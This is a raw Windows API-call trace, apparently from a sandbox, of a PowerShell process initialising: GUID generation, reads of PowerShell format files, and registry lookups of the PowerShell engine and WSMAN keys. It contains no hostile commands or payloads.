	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x8c0b6012, Data2=0xa204, Data3=0x435c, Data4=([0]=0x9c, [1]=0xec, [2]=0xd5, [3]=0xa, [4]=0x73, [5]=0x14, [6]=0xa7, [7]=0x67))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x79268579, Data2=0x8491, Data3=0x4a9b, Data4=([0]=0x90, [1]=0x15, [2]=0x7, [3]=0xdb, [4]=0x71, [5]=0xf8, [6]=0xfe, [7]=0xa0))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb6bea1c3, Data2=0xe5da, Data3=0x40d9, Data4=([0]=0xaf, [1]=0x40, [2]=0xce, [3]=0x0, [4]=0x64, [5]=0x6e, [6]=0x3c, [7]=0x25))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xe1330c71, Data2=0xf52d, Data3=0x4466, Data4=([0]=0xb4, [1]=0x19, [2]=0xbb, [3]=0xe9, [4]=0xcd, [5]=0x56, [6]=0xe1, [7]=0x13))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xfbfbb61f, Data2=0x4b29, Data3=0x4c74, Data4=([0]=0xb7, [1]=0xf0, [2]=0x2a, [3]=0x31, [4]=0x44, [5]=0xd9, [6]=0x8a, [7]=0xe1))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xd2a458c1, Data2=0x72d0, Data3=0x4646, Data4=([0]=0x84, [1]=0xc, [2]=0x9, [3]=0x37, [4]=0xf8, [5]=0x61, [6]=0xdc, [7]=0xc5))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x33021ce2, Data2=0x22f9, Data3=0x4e22, Data4=([0]=0x93, [1]=0x1a, [2]=0x23, [3]=0x72, [4]=0x9f, [5]=0xc1, [6]=0xb1, [7]=0x47))) returned 0x0
	[0528.601] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x28f85422, Data2=0x4b4c, Data3=0x47ee, Data4=([0]=0xb7, [1]=0xf9, [2]=0x1f, [3]=0xe5, [4]=0xca, [5]=0xaf, [6]=0x57, [7]=0xd9))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xbc0a3de2, Data2=0x727, Data3=0x4da4, Data4=([0]=0xb2, [1]=0xa3, [2]=0x37, [3]=0x90, [4]=0x7, [5]=0x2e, [6]=0x19, [7]=0xd9))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb6718e3b, Data2=0x2dec, Data3=0x41bb, Data4=([0]=0x86, [1]=0xc4, [2]=0x3f, [3]=0x73, [4]=0xa4, [5]=0xe9, [6]=0xbf, [7]=0x3e))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x88d0cc9c, Data2=0xff25, Data3=0x42f4, Data4=([0]=0x9e, [1]=0xfd, [2]=0xad, [3]=0x9f, [4]=0xf2, [5]=0xe9, [6]=0x4f, [7]=0xb6))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xc5df1bc2, Data2=0x7afa, Data3=0x41e2, Data4=([0]=0xaf, [1]=0x6f, [2]=0xf1, [3]=0x19, [4]=0x89, [5]=0xc8, [6]=0xad, [7]=0x79))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xba541ea3, Data2=0x2bad, Data3=0x4365, Data4=([0]=0x86, [1]=0x6b, [2]=0x29, [3]=0x8f, [4]=0xa4, [5]=0xff, [6]=0xb, [7]=0x71))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x3d9666ab, Data2=0xbdf, Data3=0x4bcb, Data4=([0]=0x9e, [1]=0x2c, [2]=0x11, [3]=0xba, [4]=0x6e, [5]=0x63, [6]=0x33, [7]=0xe4))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xd2cd54bd, Data2=0x5aa2, Data3=0x45e2, Data4=([0]=0x95, [1]=0xf5, [2]=0x3f, [3]=0x2, [4]=0x69, [5]=0x25, [6]=0x12, [7]=0x11))) returned 0x0
	[0528.602] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x3fab7150, Data2=0xdea9, Data3=0x4881, Data4=([0]=0x9f, [1]=0xb, [2]=0x21, [3]=0xac, [4]=0xcd, [5]=0x7, [6]=0x2b, [7]=0x77))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x20d4b61c, Data2=0x395f, Data3=0x4448, Data4=([0]=0x84, [1]=0x29, [2]=0xc7, [3]=0xf8, [4]=0x2b, [5]=0xd7, [6]=0xac, [7]=0x69))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x709a383b, Data2=0x7ce6, Data3=0x4a1f, Data4=([0]=0xa3, [1]=0xdf, [2]=0xf7, [3]=0x99, [4]=0xb, [5]=0x53, [6]=0xec, [7]=0x15))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x394129eb, Data2=0x1fc9, Data3=0x4acb, Data4=([0]=0xb6, [1]=0xe1, [2]=0x12, [3]=0xba, [4]=0xa9, [5]=0x40, [6]=0xbe, [7]=0x57))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x9831e26e, Data2=0x12e9, Data3=0x44e0, Data4=([0]=0xb3, [1]=0x86, [2]=0xd7, [3]=0x3d, [4]=0x73, [5]=0xf6, [6]=0x58, [7]=0xed))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x4bf8ffc0, Data2=0xaa70, Data3=0x4509, Data4=([0]=0xb7, [1]=0x89, [2]=0xca, [3]=0x35, [4]=0x73, [5]=0xa7, [6]=0x56, [7]=0xb7))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x29467dbe, Data2=0x222d, Data3=0x4f80, Data4=([0]=0xb7, [1]=0x74, [2]=0x45, [3]=0xd9, [4]=0x5, [5]=0x84, [6]=0x15, [7]=0x6f))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x1087e96c, Data2=0x393d, Data3=0x4377, Data4=([0]=0x98, [1]=0x5, [2]=0xe0, [3]=0x24, [4]=0x10, [5]=0x7c, [6]=0x48, [7]=0x13))) returned 0x0
	[0528.603] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6391b320, Data2=0xc738, Data3=0x4856, Data4=([0]=0xa0, [1]=0x2b, [2]=0x58, [3]=0x3f, [4]=0xd5, [5]=0x18, [6]=0xa1, [7]=0xa6))) returned 0x0
	[0528.604] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xba1d0f44, Data2=0x895f, Data3=0x4703, Data4=([0]=0xad, [1]=0xca, [2]=0x19, [3]=0x50, [4]=0x34, [5]=0xd3, [6]=0x6e, [7]=0xd4))) returned 0x0
	[0528.604] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xf8e9a270, Data2=0x3ff1, Data3=0x4c79, Data4=([0]=0xa3, [1]=0x48, [2]=0xc, [3]=0xe0, [4]=0xdc, [5]=0x7a, [6]=0x3c, [7]=0x99))) returned 0x0
	[0528.604] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x66c04fd4, Data2=0x62a0, Data3=0x48e5, Data4=([0]=0xbe, [1]=0x3a, [2]=0x38, [3]=0xff, [4]=0x19, [5]=0xff, [6]=0x4e, [7]=0xa8))) returned 0x0
	[0528.604] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x4866bfe3, Data2=0xfd0d, Data3=0x46ca, Data4=([0]=0xbd, [1]=0x97, [2]=0x2a, [3]=0xff, [4]=0x6e, [5]=0x20, [6]=0xdd, [7]=0x16))) returned 0x0
	[0528.610] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x3cef98a, Data2=0x77c1, Data3=0x4727, Data4=([0]=0x87, [1]=0xde, [2]=0x4b, [3]=0xb9, [4]=0x2f, [5]=0x85, [6]=0xd5, [7]=0x9d))) returned 0x0
	[0528.610] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x99db7d15, Data2=0x66a0, Data3=0x4a6b, Data4=([0]=0xb0, [1]=0xa2, [2]=0xd6, [3]=0x51, [4]=0x27, [5]=0x6c, [6]=0x71, [7]=0x6))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xe5b4bd38, Data2=0x2bdf, Data3=0x4e6d, Data4=([0]=0x8b, [1]=0x68, [2]=0x22, [3]=0x5, [4]=0xeb, [5]=0xfc, [6]=0xaf, [7]=0x32))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6fca961b, Data2=0x8e62, Data3=0x41bb, Data4=([0]=0x97, [1]=0xf, [2]=0x22, [3]=0xe2, [4]=0xa7, [5]=0xce, [6]=0xb3, [7]=0x8e))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x57331389, Data2=0x1ab1, Data3=0x4bc0, Data4=([0]=0x8d, [1]=0xfc, [2]=0x82, [3]=0x5b, [4]=0x13, [5]=0x5b, [6]=0xa7, [7]=0x38))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x7a290a69, Data2=0x1c7d, Data3=0x4b57, Data4=([0]=0x8d, [1]=0xec, [2]=0x62, [3]=0x9e, [4]=0xdb, [5]=0xe8, [6]=0x4, [7]=0xcc))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xad0a7258, Data2=0x6704, Data3=0x416d, Data4=([0]=0x96, [1]=0x89, [2]=0x89, [3]=0xb8, [4]=0xc8, [5]=0x8f, [6]=0x3f, [7]=0xf3))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x2ed25180, Data2=0x803e, Data3=0x45f6, Data4=([0]=0xaa, [1]=0xf0, [2]=0x8c, [3]=0x83, [4]=0x3d, [5]=0xc5, [6]=0x81, [7]=0x24))) returned 0x0
	[0528.611] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xe27a68b0, Data2=0x6616, Data3=0x4991, Data4=([0]=0x8a, [1]=0xbd, [2]=0x90, [3]=0x78, [4]=0x41, [5]=0x7a, [6]=0x6b, [7]=0x76))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb6fbd533, Data2=0x75b4, Data3=0x43df, Data4=([0]=0x83, [1]=0x41, [2]=0xbc, [3]=0x0, [4]=0xb8, [5]=0x22, [6]=0xfe, [7]=0xec))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x234179fd, Data2=0xd308, Data3=0x49cb, Data4=([0]=0x9a, [1]=0x3f, [2]=0xa5, [3]=0x26, [4]=0x6c, [5]=0x42, [6]=0x84, [7]=0x10))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x65ab9b5e, Data2=0xc0af, Data3=0x4b7f, Data4=([0]=0xb3, [1]=0x1, [2]=0xf8, [3]=0xd, [4]=0x22, [5]=0xc8, [6]=0xa4, [7]=0xf4))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xc89ec137, Data2=0x8869, Data3=0x4f39, Data4=([0]=0xb7, [1]=0xae, [2]=0xaa, [3]=0xe0, [4]=0x58, [5]=0xc6, [6]=0x56, [7]=0xe1))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x563adbb5, Data2=0x6d56, Data3=0x4668, Data4=([0]=0x80, [1]=0x3b, [2]=0x80, [3]=0x21, [4]=0x69, [5]=0x8e, [6]=0x43, [7]=0x32))) returned 0x0
	[0528.612] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0xb9d0392e, Data2=0x6dc9, Data3=0x48b2, Data4=([0]=0xa5, [1]=0x9d, [2]=0x28, [3]=0xa0, [4]=0xa7, [5]=0x39, [6]=0x9e, [7]=0xdf))) returned 0x0
	[0528.613] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\powershelltrace.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0528.613] GetFileType (hFile=0x320) returned 0x1
	[0528.613] SetErrorMode (uMode=0x1) returned 0x1
	[0528.613] GetFileType (hFile=0x320) returned 0x1
	[0528.613] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.614] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.614] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.614] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.615] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x8b4, lpOverlapped=0x0) returned 1
	[0528.615] ReadFile (in: hFile=0x320, lpBuffer=0x3152944, nNumberOfBytesToRead=0x34c, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3152944*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.615] ReadFile (in: hFile=0x320, lpBuffer=0x3153528, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3153528*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.615] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0528.615] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0528.615] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0528.615] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0528.615] CoTaskMemFree (pv=0x32ca00) 
	[0528.615] RegCloseKey (hKey=0x320) returned 0x0
	[0528.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0528.616] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\PowerShellTrace.format.ps1xml", lpFilePart=0x0) returned 0x48
	[0528.616] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6b4d0a05, Data2=0xcb7c, Data3=0x4234, Data4=([0]=0xae, [1]=0xc6, [2]=0x38, [3]=0x80, [4]=0xaf, [5]=0x4c, [6]=0xaf, [7]=0xb8))) returned 0x0
	[0528.616] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x3115b4b8, Data2=0xbf4c, Data3=0x4b9d, Data4=([0]=0x9e, [1]=0x56, [2]=0x24, [3]=0x3f, [4]=0xe2, [5]=0x48, [6]=0x3e, [7]=0x16))) returned 0x0
	[0528.616] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\registry.format.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x320
	[0528.617] GetFileType (hFile=0x320) returned 0x1
	[0528.617] SetErrorMode (uMode=0x1) returned 0x1
	[0528.617] GetFileType (hFile=0x320) returned 0x1
	[0528.617] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0x1000, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0xe98, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3190910, nNumberOfBytesToRead=0x168, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3190910*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.618] ReadFile (in: hFile=0x320, lpBuffer=0x3191310, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0xecdb8, lpOverlapped=0x0 | out: lpBuffer=0x3191310*, lpNumberOfBytesRead=0xecdb8*=0x0, lpOverlapped=0x0) returned 1
	[0528.619] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xece48 | out: phkResult=0xece48*=0x320) returned 0x0
	[0528.619] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecdcc, lpData=0x0, lpcbData=0xecdc8*=0x0 | out: lpType=0xecdcc*=0x1, lpData=0x0, lpcbData=0xecdc8*=0x56) returned 0x0
	[0528.619] CoTaskMemAlloc (cb=0x5a) returned 0x32ca00
	[0528.619] RegQueryValueExW (in: hKey=0x320, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xecd9c, lpData=0x32ca00, lpcbData=0xecd98*=0x56 | out: lpType=0xecd9c*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xecd98*=0x56) returned 0x0
	[0528.619] CoTaskMemFree (pv=0x32ca00) 
	[0528.619] RegCloseKey (hKey=0x320) returned 0x0
	[0528.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xeca90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0528.619] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", nBufferLength=0x105, lpBuffer=0xec940, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\Registry.format.ps1xml", lpFilePart=0x0) returned 0x41
	[0528.620] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x5025521, Data2=0xf359, Data3=0x47e4, Data4=([0]=0x9b, [1]=0x1f, [2]=0x92, [3]=0x58, [4]=0xb8, [5]=0x9a, [6]=0xb7, [7]=0x3))) returned 0x0
	[0528.620] CoCreateGuid (in: pguid=0xed070 | out: pguid=0xed070*(Data1=0x6269b5db, Data2=0x6b97, Data3=0x4ffc, Data4=([0]=0x8f, [1]=0x9, [2]=0xd4, [3]=0xdd, [4]=0x83, [5]=0x24, [6]=0xc0, [7]=0x23))) returned 0x0
	[0529.858] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0529.859] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", nBufferLength=0x105, lpBuffer=0xece10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.Commands.Diagnostics\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.Commands.Diagnostics.dll", lpFilePart=0x0) returned 0x8e
	[0531.874] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.874] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.874] CoTaskMemFree (pv=0x30ac60) 
	[0531.876] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.876] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.876] CoTaskMemFree (pv=0x30ac60) 
	[0531.877] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.877] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.877] CoTaskMemFree (pv=0x30ac60) 
	[0531.879] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.879] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.879] CoTaskMemFree (pv=0x30ac60) 
	[0531.891] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.891] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.891] CoTaskMemFree (pv=0x30ac60) 
	[0531.892] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.892] CoTaskMemFree (pv=0x30ac60) 
	[0531.892] CoTaskMemAlloc (cb=0x104) returned 0x30ac60
	[0531.892] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x30ac60, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0531.892] CoTaskMemFree (pv=0x30ac60) 
	[0531.898] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xed058 | out: phkResult=0xed058*=0x320) returned 0x0
	[0531.900] RegQueryInfoKeyW (in: hKey=0x320, lpClass=0x0, lpcchClass=0x0, lpReserved=0x0, lpcSubKeys=0xecf5c, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecf58, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0 | out: lpClass=0x0, lpcchClass=0x0, lpcSubKeys=0xecf5c*=0x6, lpcbMaxSubKeyLen=0x0, lpcbMaxClassLen=0x0, lpcValues=0xecf58*=0x3, lpcbMaxValueNameLen=0x0, lpcbMaxValueLen=0x0, lpcbSecurityDescriptor=0x0, lpftLastWriteTime=0x0) returned 0x0
	[0531.900] CoTaskMemFree (pv=0x0) 
	[0531.901] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0531.901] RegEnumValueW (in: hKey=0x320, dwIndex=0x0, lpValueName=0x2c9220, lpcchValueName=0xed008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="StackVersion", lpcchValueName=0xed008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0531.901] CoTaskMemFree (pv=0x2c9220) 
	[0531.901] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0531.901] RegEnumValueW (in: hKey=0x320, dwIndex=0x1, lpValueName=0x2c9220, lpcchValueName=0xed008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="SupportsCompatListeners", lpcchValueName=0xed008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0531.901] CoTaskMemFree (pv=0x2c9220) 
	[0531.901] CoTaskMemAlloc (cb=0x204) returned 0x2c9220
	[0531.902] RegEnumValueW (in: hKey=0x320, dwIndex=0x2, lpValueName=0x2c9220, lpcchValueName=0xed008, lpReserved=0x0, lpType=0x0, lpData=0x0, lpcbData=0x0 | out: lpValueName="UpdatedConfig", lpcchValueName=0xed008, lpType=0x0, lpData=0x0, lpcbData=0x0) returned 0x0
	[0531.902] CoTaskMemFree (pv=0x2c9220) 
	[0531.902] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xecfec, lpData=0x0, lpcbData=0xecfe8*=0x0 | out: lpType=0xecfec*=0x1, lpData=0x0, lpcbData=0xecfe8*=0x8) returned 0x0
	[0531.902] CoTaskMemAlloc (cb=0xc) returned 0x1b8387f0
	[0531.902] RegQueryValueExW (in: hKey=0x320, lpValueName="StackVersion", lpReserved=0x0, lpType=0xecfbc, lpData=0x1b8387f0, lpcbData=0xecfb8*=0x8 | out: lpType=0xecfbc*=0x1, lpData="2.0", lpcbData=0xecfb8*=0x8) returned 0x0
	[0531.902] CoTaskMemFree (pv=0x1b8387f0) 
	[0533.635] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\WSMAN", ulOptions=0x0, samDesired=0x20019, phkResult=0xecfa8 | out: phkResult=0xecfa8*=0x320) returned 0x0
